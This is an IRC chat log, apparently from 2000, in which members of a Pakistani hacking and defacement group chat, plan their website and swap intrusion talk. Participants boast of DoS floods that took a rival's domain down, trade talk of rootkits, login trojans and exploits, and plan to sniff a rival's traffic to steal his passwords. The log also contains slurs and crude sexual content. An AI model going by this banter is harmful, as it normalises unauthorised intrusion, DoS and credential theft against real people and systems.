      :b0b :and once we develop m4d C skillz.. we'll develop D
      :D1ck :kekekeke
      :b0b :the ultimate in URDU coding
      :b0b :eeeeeeeeeeeekekekekekekekekekeke
      :b0b :grep == dhoond
      :b0b :no no
      :b0b :find == dhoond
      :b0b :locate == madarcho-dhond
      :m4ry :MILLER@&*(#^*(@%^#*(&@
      :b0b :export == duramad
      :b0b :m4ry 
      :b0b :i was just doing some concept shiats for D
      :b0b :the ultimate in URDU coding
      :b0b :the base for urdunix
      :m4ry :HAHAHAHAHAHAHAHAHAHAHAH
      :b0b :export == duramad
      :b0b :find == dhoond
      :b0b :locate == madarchod-dhoond
      :b0b :exit == lun
      :b0b :BitchX == kutti
      :b0b :eehee
      :b0b :first.. lets develop BitchX in URDU
      :b0b :KuttiX
      :m4ry :l33t
      :m4ry :run == bhago
      :m4ry :LOL
      :m4ry :HAHAHAHA
      :m4ry :KuttiX.. LOL
      :b0b :eehee
      :b0b :./kick == /thudda
      :m4ry :D1ck
      :D1ck :miller
      :D1ck :u there?
      :D1ck :i got d/c
      :b0b :./op ==/ooperbitha
      :D1ck :some one is dosing me :)
      :b0b :no.. it's my friend bubloo
      :b0b :OF COURSE I'M HERE DAMMIT 
      :D1ck :m4ry 
      :D1ck :m4ry 
      :b0b :btw guys...
      :D1ck :y0h
      :b0b :guess how many hosts i have in my bclist?
      :D1ck :b0b  how many?
      :D1ck :udp flood > *
      :m4ry :.yo yo
      :m4ry :b0b: 28
      :m4ry :b0b: 5
      :D1ck :it literally rapes bandwith.
      :m4ry :how close ami?
      :m4ry :# telnet napster.com 80
      :m4ry :Trying 208.184.216.230...
      :m4ry :Connected to napster.com.
      :m4ry :Escape character is '^]'.
      :m4ry :HEAD / HTTP/1.1
      :m4ry :SYN FLOOD > *
      :b0b :phuck yew
      :D1ck :heh m4ry
      :b0b :2066 bloody 
      :m4ry :b0b: how many?
      :b0b :the scan is reaheaheaheahly slow
      :m4ry :HAHAHAHA
      :m4ry :aww
      :m4ry :ur not l33t :P~
      :m4ry :l33t hax0rs have 3 bcasts
      :m4ry :which return thouussannndsss of pings
      :m4ry :(in my dreams)
      :m4ry :hehe
      :b0b :ehehehehe
      :b0b :this is one BIG ass bc
      :b0b :who wants a taste?
      :b0b :just 100 pings?
      :D1ck :HAHAHAHAH
      :D1ck :syn  0wns y3w niggah
      :D1ck ::
      :D1ck :HAHAHAHAHAHA
      :D1ck :g|ngah
      :D1ck :b0b: take broadscan by pshysoid
      :D1ck :NOT ME
      :D1ck :
      :D1ck ::)
      :D1ck :me and J4n3 and m4ry have TONS TONS TONS bandwith :/
      :D1ck :we use it on h4r33 
      :D1ck :heh
      :D1ck :h4r33 is ultra lame
      :D1ck :
      :b0b :lol
      :D1ck :not worth a thought
      :D1ck ::)
      :D1ck :hehe
      :D1ck :cricket match is funny
      :b0b :damn
      :b0b :gotta jet
      :b0b :later all
      :b0b :fuck cricket
      :b0b :winuke their arses
      :b0b :laters
      :D1ck :heh
      :D1ck :<b0b> damn
      :__m4ry :someone traceroute 192.168.4.191 UDP port 53
      :__m4ry :aww
      :__m4ry :he ran away again
      :__m4ry :__m4ry is viper@192.168.252.32 * 3r33t hackers don't read mIRC.doc
      :__m4ry :HEHE
      :D1ck :<b0b> gotta jet
      :D1ck :<b0b> later all
      :D1ck :<b0b> fuck cricket
      :D1ck :<b0b> winuke their arses
      :D1ck : SignOff b0b: 
      :D1ck :          ])
      :D1ck :he's gone for another 4 months 
      :D1ck :HEHE
      :D1ck :hhahaha
      :D1ck :;)
      :D1ck :m4ry
      :D1ck :help me
      :D1ck :sysop:(
      :HeatAz :yeah
      :HeatAz : :
      :HeatAz ::/
      :D1ck :hehehe
      :m4ry :helping
      :m4ry :sup?
      :D1ck :hahaha
      :m4ry :LOL
      :D1ck :well
      :D1ck :cat world | grep -v sysop > hell
      :D1ck :PLEASE
      :D1ck :;)
      :D1ck ::(
      :m4ry :lol
      :m4ry :egrep sysop /dev/world > /dev/hell
      :D1ck :heh
      :D1ck :m4ry
      :D1ck :i`m making a mad elite
      :D1ck :ftp site
      :m4ry :D1ck..
      :m4ry :could u please traceroute 192.168.4.191 -p 53
      :m4ry :?
      :D1ck :just for amoung us
      :D1ck :its got every thing
      :D1ck :# ls
      :D1ck :bd   botpack  dos      hack-irc-session  local  scan   spoof
      :D1ck :bnc  clone    exploit  kit               login  sniff
      :D1ck :k
      :D1ck :traceroute to 192.168..4.191 (192.168.4.191), 30 hops max, 38 byte packets
      :D1ck : 1  192.168.232.254 (192.168.232.254)  148.127 ms  151.760 ms  160.238 ms
      :D1ck : 2  192.168.232.3 (192.168.232.3)  154.337 ms  138.676 ms  139.853 ms
      :D1ck : 3  192.168.244.30 (192.168.244.30)  226.507 ms  225.720 ms
      :D1ck : 3  192.168.244.30 (192.168.244.30)  226.507 ms  225.720 ms *
      :D1ck : 4  192.168.129.13 (192.168.129.13)  1170.320 ms  1041.645 ms  1221.868 ms
      :D1ck :m4ry
      :D1ck :u have any thing elite to contribute there?
      :D1ck :[Sysop_(~sys@example.com)] hey
      :D1ck :YOH HA NA
      :D1ck :ROXZ
      :D1ck :HE JUST HIT A SIX
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :b0b :brb, reading mail etc.
      :b0b :ACTION is idle, mail shail [bX(l/on p/on)]
      :D1ck :J4n3 
      :J4n3 :hmmm
      :J4n3 :oye miller was here ?
      :D1ck :0 J4n3 
      :D1ck :y0 J4n3 
      :D1ck :yep
      :D1ck :millah was here.
      :D1ck ::)
      :J4n3 :ohhh
      :J4n3 :missed him
      :J4n3 ::(
      :J4n3 :D1ck gime a elitee rootkit for linux
      :D1ck :hehe
      :J4n3 :same like sparc if u have
      :D1ck :h3h
      :D1ck :oki d0kies
      :D1ck :i will have to ftp, i`ll send u at night ok?
      :J4n3 :hmm okies, i'm gonna sploit linux boxes of edu
      :D1ck :oki dokies
      :D1ck :brb booting
      :D1ck :to win
      :D1ck :g0ne
      :J4n3 :kkz
      :m4ry :D1ck
      :m4ry :you there?
      :Sp07 :
      :D1ck :hi
      :D1ck :i`m gonna be posting k1dd13's site
      :D1ck :soon
      :D1ck ::)
      :D1ck :J4n3
      :D1ck :miller send me that web.tar.gz
      :D1ck :;)
      :Sp07 :oh
      :D1ck :i want some one with good writing skillz
      :D1ck ::/
      :D1ck :to write About, FAQ
      :D1ck :etc
      :D1ck ::)
      :D1ck :Sp07
      :D1ck :hmm
      :D1ck :PLAYING GAMEs?
      :Sp07 :nope
      :Sp07 :going to ergister a chanenl
      :Sp07 :sdgf
      :D1ck :hHAHAHAHAH
      :D1ck :ok
      :Sp07 :
      :Sp07 :I should make a game.tcl
      :Sp07 :thingy
      :Sp07 :majigger
      :D1ck :haha
      :Sp07 :somthinge
      :Sp07 :cool
      :Sp07 :how about portscan tcl
      :Sp07 :I want to make something new
      :D1ck :tell me
      :D1ck :is this para write for About
      :D1ck :?
      :D1ck :K1dd13 came into existance almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and
      :Sp07 :?
      :D1ck :organizations to the issue in cyberspace which is today the leading source of communication.
      :D1ck :is that fair enuff?
      :Sp07 :eyah I guess
      :Sp07 :I thought it was like a hacking group
      :Sp07 :hehe
      :Sp07 :not some terrorist group
      :D1ck :what should i add.
      :D1ck :?
      :D1ck :it is a hacking
      :D1ck :group
      :D1ck :but
      :D1ck :hahahahaa
      :D1ck :man u dont know kashmir
      :D1ck :if u see the pictures
      :D1ck :anyway
      :D1ck :what else should i add.
      :D1ck :?
      :Sp07 :add some pornh
      :D1ck :hha
      :Sp07 :what is lahore ?
      :D1ck :lahore==city
      :D1ck :Sp07 give me a good quote
      :Sp07 :I thought it was the whore in french
      :Sp07 :ill go get a quote fo you
      :D1ck :heh
      :D1ck :ok
      :Sp07 :I dont know any in my ehad
      :Sp07 :hea
      :Sp07 :d
      :Sp07 :Silence is gold, if nothing better you hold.
      :Sp07 :tahts gay
      :Sp07 :I heard a quote before
      :Sp07 :goes something like "If you want peace, you must prepare for war"
      :Sp07 :I herad it in a simpsons episode
      :Sp07 :name = Stone Cold
      :Sp07 :e-mail = **
      :Sp07 :homepage = **
      :Sp07 :town = ??
      :Sp07 :country = ??
      :Sp07 :Quote = Don't bring a knife to a gun fight 
      :Sp07 :hahahaa
      :Sp07 :"Never flush the toilet while taking a shower."
      :Sp07 :how about Famous Last Words
      :Sp07 :-- Abraham Lincoln 
      :Sp07 :          A house divided against itself cannot stand.
      :Sp07 :          The Bible is not my book, and Christianity is not my religion. I could never give assent to the long,
      :Sp07 :          complicated statements of Christian dogma. 
      :Sp07 :          You can fool all the people some of the time, and some of the people all the time, but you cannot fool all
      :Sp07 :          the people all the time. 
      :Sp07 :          My great concern is not whether you have failed, but whether you are content with your failure. 
      :Sp07 :    
      :Sp07 :Nearly all men can stand adversity, but if you want to test a man's character, give him power. 
      :Sp07 :          Better to remain silent and be thought a fool then to speak out and remove all doubt. 
      :Sp07 :          Things may come to those who wait, but only the things left by those who hustle. 
      :Sp07 :          Most people are about as happy as they make up their minds to be. 
      :Sp07 :          Tact is the ability to describe others as they see themselves. 
      :Sp07 :          He has the right to criticize who has the heart to help. 
      :Sp07 :  
      :Sp07 :I destroy my enemy when I make him my friend. 
      :Sp07 :While one person hesitates because he feels inferior, the other is busy making mistakes and becoming
      :Sp07 :          superior. 
      :Sp07 :New opinions are always suspected, and usually opposed, without any other reason but because they
      :Sp07 :          are not already common. 
      :D1ck :hehe
      :Sp07 :-- Jay Leno
      :Sp07 :          If God doesn't destroy Hollywood Boulevard, he owes Sodom and Gomorrah an apology.
      :Sp07 :If you want truly to understand something, try to change it. 
      :Sp07 :teghres lots of quotes
      :Sp07 :I ilke lincolns quotes
      :Sp07 :-- Julius Caesar 
      :Sp07 :          I came, I saw, I conquered. 
      :Sp07 :thats me
      :D1ck :hahah
      :D1ck :J4n3
      :D1ck :when u come bak, message me it's important.
      :D1ck :wtf
      :D1ck :?
      :D1ck :J4n3
      :D1ck :J4n3
      :D1ck :J4n3
      :D1ck :Sp07
      :D1ck :make me a gRaF|X
      :D1ck :http://www9.example.com/k1dd13/'
      :Sp07 :send me photoshop and I will do it
      :Sp07 :hehe
      :D1ck :h3h
      :Sp07 :let me go check out the website
      :D1ck :(Sp07): let me go check out the website
      :D1ck :*** Disconnected
      :D1ck :*** Rejoined channel 
      :D1ck :what did u say after that
      :Sp07 :?
      :Sp07 :nothing
      :D1ck :u like the site
      :D1ck :what wil u give it out of 10
      :D1ck :?
      :D1ck :1
      :D1ck :?
      :D1ck :2
      :D1ck :?
      :D1ck :3?
      :D1ck :0?
      :Sp07 :.654564
      :Sp07 :hheh
      :Sp07 :its ok
      :D1ck ::(
      :Sp07 :it would be better if it wasnt on a free web thingy
      :Sp07 :www.k1dd13.com
      :Sp07 :or something
      :D1ck :yep
      :D1ck :i`m getting it
      :D1ck :k1dd13-online.org
      :D1ck :www.k1dd13-online.org
      :D1ck :it's under construction dude
      :D1ck ::P
      :D1ck :tons of typos
      :D1ck :needs tons of graphic
      :D1ck :needs tons of graphics
      :D1ck ::)
      :Sp07 :oh
      :D1ck :have to pout perl scripts
      :D1ck :tools
      :D1ck :archieve
      :D1ck :tons of work
      :D1ck ::;
      :D1ck ::;/
      :Sp07 :want to make a website for me
      :Sp07 :?
      :Sp07 :DICKWAD
      :D1ck :heh
      :Sp07 :hehe
      :D1ck :nO
      :Sp07 :potheads.net
      :D1ck :it's hard
      :D1ck :plus i`m getting it made:)
      :Sp07 :=(
      :D1ck :=(
      :Sp07 :any new exploits for redhat 6.1?
      :Sp07 :in the last month or so?
      :Sp07 :I just want to root my friends server so I can make my vhost since hes not doing it
      :D1ck :lol
      :Sp07 :nb       
      :Sp07 :hey
      :Sp07 :Im making an internet search tcl
      :_-Ahsan-_ :LOL
      :_-Ahsan-_ :was were
      
      
      -=-
      
      Day 03 June 6
      
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga shit * *
      :D1ck! :s3ga rshit * *
      :D1ck! :.shit * *
      :D1ck! :.shit * *
      :D1ck! :s3ga help shit
      :D1ck! :.shit * *
      :D1ck! :back
      :D1ck! :J4n3
      :D1ck! :u there?
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :D1ck! :J4n3: WHNE U COME BACK, msg ME , it's important
      :J4n3! :D1ck ma back
      :D1ck! :mah bOy
      :D1ck! :mah bOy
      :D1ck! :mah bOy
      :D1ck! :done graph1x?
      :J4n3! :graphix tho already hain, i'm workin on that java and password cgi
      :J4n3! :downloaded too many scripts, and expermenting with them
      :J4n3! :hey d1ck wanted to ask u something
      :D1ck! :oki
      :J4n3! :tomorrow thak page ready hojayega with graphics java and cgi password protected
      :J4n3! :ok listen ek system aisa hai kay jo sploits page hoga uska name password hoga
      :J4n3! :i mean if page name is sploit898.html
      :J4n3! :that would be the pass
      :J4n3! :if someone click on sploits link
      :J4n3! :another window will appear
      :J4n3! :and it will ask for password
      :J4n3! :if someone know that html page name then it will go through
      :J4n3! :otherwise it wont
      :J4n3! :what u say ?
      :D1ck! :oh
      :D1ck! :welp
      :D1ck! :dunno u choose
      :D1ck! ::P
      :J4n3! :and yeah that banner change script be mila hai it will change at least 5 graphics
      :D1ck! :yep okies
      :D1ck! :cool
      :J4n3! :i mean 5 banners u can select it will change everytime
      :D1ck! :;)
      :J4n3! :heh its complicated workin with cgi and java :/
      :D1ck! :hehe
      :D1ck! ::?
      :D1ck! ::/
      :J4n3! :haha i like ur chat style
      :J4n3! ::?
      :J4n3! ::/
      :J4n3! :hehe
      :J4n3! :tight
      :J4n3! :yaar that synflood is tight
      :J4n3! :u know some hackphreak guy took over deathace's nick 2 weeks ago
      :J4n3! :with his bot with ip *
      :D1ck! :YEP
      :D1ck! :yep in know i dossed him 2 times
      :D1ck! :he is linuxsex ka guy
      :D1ck! :;)
      :D1ck! :yup
      :J4n3! :hahah lol
      :J4n3! :i dossed him from 9 rewts
      :J4n3! :he went down for 7 hours
      :J4n3! :lol
      :J4n3! :all his domain example.com was down
      :D1ck! :wow
      :D1ck! :HAHAHAHAHAHAHAHA
      :D1ck! :kewl
      :D1ck! :;)
      :J4n3! :haha yeahh
      :J4n3! :i got his nick back u can see it in #k1dd13
      :D1ck! :cool cool
      :D1ck! :;)
      :D1ck! :oye
      :D1ck! :attrition.org say saray mirror akathain karnay hain
      :D1ck! :attrition.org say saray mirror akathain karnay hain
      :D1ck! :yep
      :D1ck! :i see
      :J4n3! :ahaan no problem
      :J4n3! :ahaan no problem
      :J4n3! :karlaingay
      :J4n3! :yaar worldtel sux
      :J4n3! :it sux all the day only works fine in morning :(
      :D1ck! :*** D1ck changes topic to 'kipitipa nipamipa jipa sepa bah bah blah........'
      :D1ck! :(@J4n3): ahaan no problem
      :D1ck! :(@J4n3): karlaingay
      :D1ck! :*** Disconnected
      :D1ck! :*** Rejoined channel 
      :D1ck! : 
      :D1ck! : (#k1dd13) topic- 'kipitipa nipamipa jipa sepa bah bah blah........'
      :D1ck! : (#k1dd13) topic- set by D1ck (Tue 6th Jun 2000 10:03p)
      :D1ck! :HAFEZ
      :D1ck! :world TEL sucks
      :D1ck! :
      :D1ck! :wOrlDtEl suXx
      :J4n3! :yeah yeah yeah
      :J4n3! :it does
      :J4n3! :it does 
      :J4n3! ::(
      :J4n3! ::(
      :J4n3! ::/
      :J4n3! :only rox in morning
      :J4n3! :sux all the day 
      :D1ck! :hahahaha
      :D1ck! :hmmmmmmmmmm
      :D1ck! :hehe
      :D1ck! :http://www9.example.com/k1dd13/Article3.html
      :D1ck! :send me the graphix.jpg
      :D1ck! ::)
      :D1ck! :the elite 'K1dd13 Online' one
      :J4n3! ::/
      :J4n3! :satnet is lot better yaar
      :J4n3! :it only sux in night e or r hours
      :J4n3! :errr i made only of THE K1dd13 :/
      :J4n3! :oye tell me how do i mount my drive d ?
      :D1ck! :http://www9.example.com/k1dd13/Article3.html
      :D1ck! :d:
      :D1ck! :?
      :J4n3! :hmmm let me check
      :D1ck! :mount /mnt/cdrom
      :J4n3! :yaar drive d
      :D1ck! :mount -t msdos /dev/fd0 /mnt/floppy
      :J4n3! :no no
      :D1ck! :mount -t vfat /dev/hda1 /mnt/win
      :J4n3! :for mounting drive c i write mount -t msdos /dev/hda1 /mnt
      :D1ck! :?
      :D1ck! :cd
      :D1ck! :(@J4n3): for mounting drive c i write mount -t msdos /dev/hda1 /mnt
      :D1ck! :i write
      :D1ck! :mount -t vfat /dev/hda1 /heh
      :J4n3! :i have partitions c d and e
      :J4n3! :by using above command it mount drive c but not d and e , cd is drive g
      :D1ck! :mkdir hh
      :D1ck! :mkdir heh
      :J4n3! :heh but it works
      :D1ck! :hahaha
      :D1ck! :ok
      :D1ck! :i know
      :D1ck! :do this 'df'
      :D1ck! :and paste me
      :D1ck! :and then df -k
      :J4n3! :wait
      :J4n3! :Filesystem           1k-blocks      Used Available Use% Mounted on
      :D1ck! :what is yure d? /dev/hda2?
      :D1ck! :what is yure d? /dev/dba1
      :D1ck! :?
      :J4n3! :.Filesystem           1k-blocks      Used Available Use% Mounted on
      :J4n3! :./dev/hda8              1935132    878956    957780  48% /
      :J4n3! :./dev/hda7                23302      2650     19449  12% /boot
      :J4n3! :./dev/hda1              2064032   1230496    833536  60% /mnt
      :D1ck! :oki
      :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
      :D1ck! :wait, what is /dev/hda7
      :D1ck! :?
      :J4n3! :linux swap partition
      :D1ck! :ok
      :D1ck! :mkdir /win; mount -t vfat /dev/hda2 /win
      :J4n3! :hda8 is native
      :D1ck! :do this and tell me what u get
      :D1ck! :yep yep
      :J4n3! :[root@example portedfor]# mkdir /win; mount -t vfat /dev/hda2 /win
      :J4n3! :[MS-DOS FS Rel. 12,FAT 0,check=n,conv=b,uid=0,gid=0,umask=022,bmap]
      :J4n3! :[me=0x0,cs=0,#f=0,fs=0,fl=0,ds=0,de=0,data=0,se=0,ts=0,ls=0,rc=0,fc=4294967295]
      :J4n3! :Transaction block size = 512
      :J4n3! :VFS: Can't find a valid MSDOS filesystem on dev 03:02.
      :J4n3! :mount: wrong fs type, bad option, bad superblock on /dev/hda2,
      :J4n3! :       or too many mounted file systems
      :J4n3! :       (aren't you trying to mount an extended partition,
      :J4n3! :       instead of some logical partition inside?)
      :D1ck! :hmm
      :D1ck! :u have to know what is yure d:
      :D1ck! :c == /dev/hda1
      :D1ck! :d == /dev/???/
      :D1ck! :dba1
      :D1ck! :hda1
      :D1ck! :etc
      :J4n3! :hmmm /dev/hda2 i think
      :D1ck! :oye brb booting to linux
      :J4n3! :ok
      :D1ck! :then it should mount
      :D1ck! :oye brb booting to linux
      :D1ck! :oye brb booting to linux
      :J4n3! :so bol raha hon
      :D1ck! :yo
      :D1ck! :back
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! : [Lag 156]
      :J4n3! :yaar neechay gaya huwa tha
      :D1ck! :fuck
      :D1ck! :worldtel sux
      :D1ck! :oh god
      :D1ck! :welp
      :D1ck! :i`m fucking lagged
      :D1ck! :Inspectah 
      :D1ck! :w00p
      :D1ck! :sup dis
      :Sp07! :hving trouble making this tcl script and nobody has a brain to help me
      :D1ck! :hehe
      :D1ck! :tell me some thing to code
      :D1ck! :man
      :D1ck! :worldtel sucks
      :D1ck! :Sp07
      :Sp07! :?
      :Sp07! :d1ck
      :Sp07! :d1ck
      :D1ck! :supa boh
      :D1ck! :man
      :D1ck! :IRIX
      :Sp07! :?
      :D1ck! :u have a scanner for IRIX?
      :Sp07! :nope
      :D1ck! :i wana own boxes with object-something.c
      :D1ck! ::)
      :Sp07! :object-something?
      :Sp07! :umm just use solaris or linux box to scan
      :D1ck! :heh
      :D1ck! :yeah
      :D1ck! :i forgot that name
      :D1ck! :how did u own that IRIX box?
      :D1ck! :no to scan
      :D1ck! :i wana own IRIX
      :D1ck! :i need boxes to own ;)
      :Sp07! :I dont remember
      :Sp07! :delta something something.edu
      :Sp07! :heh
      :Sp07! :iit.edu
      :D1ck! :k
      :Sp07! :just scan from redhat
      :Sp07! :doesnt matter where you scan from
      :D1ck! :hehe yep
      :Sp07! :why the fuck are they letting taddpole in linuxsex
      :Sp07! :hehe
      :D1ck! :no no
      :Sp07! :are they trying to suck oper dick or something?
      :D1ck! :err, i know that dude
      :D1ck! :i want IRIX boxes address so i can ./own irix-box-address.com
      :D1ck! :Hahahhahah
      :D1ck! :dunno
      :D1ck! :i was wondering
      :Sp07! :oh
      :D1ck! ::)
      :Sp07! :I dont think every irix box is vulnerable
      :Sp07! :heh
      :Sp07! :what port does it connect to?
      :Sp07! :kcnet.org = irix
      :D1ck! :(@Sp07): I dont think every irix box is vulnerable
      :D1ck! :(@Sp07): heh
      :D1ck! :*** Disconnected
      :D1ck! :*** Rejoined channel 
      :D1ck! :fuck
      :D1ck! :my isp
      :Sp07! :[03:21] <Sp07> heh
      :Sp07! :[03:22] <Sp07> what port does it co
      :Sp07! :[03:22] <Sp07> what port does it connect to?
      :Sp07! :[03:22] <Sp07> example.org = irix
      :D1ck! :(@kurupto0n): anyone have a remote root sploit for sendmail 8.9.3?
      :D1ck! :hahaha
      :D1ck! :i`m looking for it,;)
      :D1ck! :[03:18] *** Warning- Over 30 sec lag to self
      :D1ck! :[03:19] *** Warning- Over 60 sec lag to self
      :Sp07! :haha
      :Sp07! :WARNING WARNING
      :Sp07! :afk me go play games
      :D1ck! :Sp07 
      :Sp07! :?
      :Sp07! :I just kicked some ASS
      :D1ck! :Sp07 
      :D1ck! :u there?
      :Sp07! :yes
      :D1ck! :did u see h4r33 EOF ;)?
      :D1ck! :HAHAHAHAHHA
      :D1ck! :he's ultra lame
      :D1ck! ::P
      :Sp07! :yeah
      :D1ck! :lol
      :D1ck! :kill -9 9394
      :D1ck! :pid of 'bnc'
      :Sp07! :uh hehe
      :Sp07! :why dont you sniff all the shit he does on irc
      :Sp07! :and spy on him
      :Sp07! :get his passwords
      :D1ck! :hmmmm
      :D1ck! :cna i do that?
      :Sp07! :yeah
      :D1ck! :if yes then how?
      :D1ck! :i have sniffer
      :Sp07! :hes using that shell as a bounce right?
      :Sp07! :sniff the port
      :D1ck! :on the box
      :Sp07! :that he uses
      :Sp07! :heh
      :D1ck! :./sniff -d 8000
      :D1ck! :errr
      :D1ck! :how?
      :Sp07! :uhh
      :Sp07! :find out the port number
      :Sp07! :then sniff it
      :Sp07! :with your sniffer
      :D1ck! :thats a good idea
      :Sp07! :=D
      :Sp07! :I think that will work
      :Sp07! :never tried it
      :D1ck! :fuck i trojanned the box and removed his 'trojan'
      :D1ck! :HAHAHA
      :D1ck! :oh
      :Sp07! :either sniff the port
      :Sp07! :or sniff everything going out to the irc server
      :D1ck! :motos# ./sniff-100mb -help
      :D1ck! :Usage: ./sniff-100mb [-d x] [-s] [-f] [-l] [-t] [-i interface] [-o file]
      :D1ck! :        -d int    set new data limit (128 default)
      :D1ck! :        -s        filter out smtp connections
      :D1ck! :        -f        filter out ftp connections
      :D1ck! :        -l        filter out rlogin/rsh connections
      :D1ck! :        -t        filter out telnet connections
      :D1ck! :        -o <file> output to <file>
      :D1ck! :heh
      :Sp07! :use a different sniffer heh
      :D1ck! :lol
      :Sp07! :use sniffit
      :D1ck! :they arnt many for sun
      :Sp07! :sniffit
      :D1ck! :hmmmm
      :D1ck! :oh yeah
      :Sp07! :forgot where to get it
      :D1ck! :sniffit
      :D1ck! :
      :D1ck! :get me a binary
      :D1ck! :motos# cc
      :D1ck! :gcc
      :D1ck! :motos# gcc: Command not found
      :D1ck! :./usr/ucb/cc:  language optional software package not installed
      :D1ck! :.ghay boxens
      :Sp07! :haha
      :D1ck! :;/
      :D1ck! : grid (~grid@example.net
      :D1ck! :that fucking packet m0nk
      :D1ck! :hehe
      :Sp07! :?
      :D1ck! :hahahaha
      :D1ck! :nevah mind
      :Sp07! :brass monkey
      :D1ck! :u master badah
      :D1ck! :hehee
      :Sp07! :that funky monkey
      :D1ck! :lol
      :D1ck! :heh
      :D1ck! :that roxer muh nipples
      :D1ck! :man
      :D1ck! :hmmm
      :D1ck! :give me access to a red hat box (local)_
      :D1ck! :i`ll rewt it
      :D1ck! :u know what i did yesterday?
      :D1ck! :echo "some-ip" >  roots.txt
      :D1ck! ::/
      :D1ck! :and i lost most ip's like before
      :D1ck! :i was h1gh
      :Sp07! :heh
      :Sp07! :I dont have anymore accounts except legal ones
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :ok
      :Sp07! :well actually I still have some
      :Sp07! :but I will hold on to them
      :D1ck! :ok;)
      :D1ck! :what IRIX box u just mentioned?
      :Sp07! :example.org
      :Sp07! :is irix
      :Sp07! :I had like 3 accounts there
      :Sp07! :and for some reason they all got canceled
      :Sp07! :what are some isps that allow shell access?
      :Sp07! :I wanna root some isps
      :Sp07! :whys that fag taddpole keep joining linuxsex
      :Sp07! :dos him
      :Sp07! :hehe
      :Sp07! :do /whois Sp07
      :Sp07! :im cool
      :Sp07! :I got +v in #example
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :J4n3 
      :Sp07! :damn my v went away
      :D1ck! :v?
      :D1ck! :huh
      :J4n3! :D1ck 
      :Sp07! :+
      :D1ck! :sup J4n3 
      :D1ck! :hahahhaha
      :D1ck! :lol
      :J4n3! :nuffin much :p u ?
      :D1ck! :nadda
      :D1ck! :masterbation,etc
      :D1ck! :and analing Sp07 
      :J4n3! :heh
      :J4n3! :all about sex :p
      :D1ck! :;)
      :Sp07! :uhhhhh
      :D1ck! :i just tookover 3 of diz's box today ;(
      :D1ck! :one day i did 36
      :Sp07! :suck it
      :D1ck! :heh
      :D1ck! :*ALL* his boxes
      :J4n3! :woo
      :D1ck! :Sp07 
      :D1ck! :hmmmmmm
      :D1ck! :um
      :Sp07! :?
      :D1ck! :J4n3: who'se domain example.com is?
      :D1ck! :and who host's it
      :D1ck! :satnet called up zahid eh
      :J4n3! :donno about it but know who own it
      :J4n3! :its a friend
      :D1ck! : /msg Sp07   man anal me
      :D1ck! :oooops
      :D1ck! :who?
      :D1ck! :hmmmm
      :J4n3! :i gave him sat file to publ1sh
      :D1ck! :n1ck?
      :D1ck! :oh cool
      :J4n3! :Zolo
      :D1ck! ::)
      :J4n3! :;)
      :D1ck! :hehe k
      :J4n3! :z33sh4n
      :D1ck! :ah
      :D1ck! :that a boy
      :D1ck! ::P)
      :D1ck! :zmasterz ?
      :J4n3! :they called zahid ?
      :D1ck! :u know that guy Sp07 
      :D1ck! :J4n3  yeah
      :Sp07! :yeah
      :D1ck! :k
      :J4n3! :about what ?? whay they said ?
      :D1ck! :i dunno
      :Sp07! :they wanted to suck my dick
      :Sp07! :but I turned them down
      :Sp07! :sorry
      :D1ck! :J4n3 : they were blaming a guy that he gave miller access and miller defaced..
      :D1ck! :HAHAHAHAA
      :J4n3! :LOOOOOL
      :D1ck! :Sp07
      :D1ck! :wat was that IRIX box
      :D1ck! :not the .edu
      :D1ck! :the other one u gave me to ./own
      :D1ck! :?
      :Sp07! :kcnet.org
      :D1ck! :k
      :D1ck! :Sp07: u have a IRIX, root kit u could send?
      :Sp07! :no
      :Sp07! :I just used bj
      :Sp07! :the login trojan
      :D1ck! :oh
      :D1ck! :k
      :D1ck! :send me bj.c
      :D1ck! :i lost mine
      :D1ck! :
      :Sp07! :uh
      :Sp07! :I dont have anything
      :Sp07! :hehe
      :D1ck! :heh oh
      :D1ck! :u gave up hacking
      :D1ck! :
      :Sp07! :something like that
      :Sp07! :sooner or later im gonna get arrested it
      :Sp07! :so I stopped
      :D1ck! :oh
      :D1ck! :ok
      :Sp07! :and its not making me any money so its pointless
      :D1ck! :i will NEVER GET ARRESTED
      :Sp07! :I want to start up my own web hosting server
      :D1ck! :cOzM y coUnTrY KiKs AsS
      :D1ck! :ahahah
      :D1ck! :oh
      :Sp07! :We GoT HaMBuRgErS iN My CUnTrY
      :Sp07! :hehehe
      :D1ck! :heh
      :D1ck! :IBM AIX Version 4.x for RISC System/6000
      :D1ck! :(C) Copyrights by IBM and by others 1982, 1996.
      :D1ck! :Access and use restricted to authorized individuals.
      :D1ck! :cub login:
      :D1ck! : /*   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,                  */
      :D1ck! :fuck
      :Sp07! :heh
      :D1ck! : ;p
      :Sp07! :what time is it in pakiland?
      :Sp07! :               nm
      :Sp07! :                          /~\/~\
      :Sp07! :tittiies
      :Sp07! : .  .
      :Sp07! :/~\/~\
      :Sp07! :titties
      :D1ck! :hmmmmmmm
      :D1ck! :6 am
      :Sp07! : ,  ,
      :Sp07! :/~\/~\
      :D1ck! :Entering proxyloop..
      :D1ck! :fuck
      :D1ck! :;)
      :D1ck! :uid=0(root) gid=0(root)
      :D1ck! :*sigh*
      :Sp07! :woohoOO
      :Sp07! :YipPpepEEeee
      :Sp07! :damn
      :Sp07! :it is hot in here
      :D1ck! :hehe
      :Sp07! :is it hot in here or is it just you?
      :Sp07! :is that a banana in your pocket or are you just happy to see me
      :D1ck! :its hot
      :Sp07! :hehe
      :Sp07! :im bored
      :Sp07! :yes that is a 10 foot banana in my pocket
      :D1ck! :i`ll eat halwa puri
      :D1ck! :its tasty tasy breakfast in pakistan
      :D1ck! :u get it for $2
      :D1ck! :or $1
      :D1ck! :J4n3  janies
      :D1ck! :scan for bind 8.2
      :D1ck! :8.2.1
      :D1ck! :HELLO
      :D1ck! :Sp07 
      :D1ck! :a/s/;
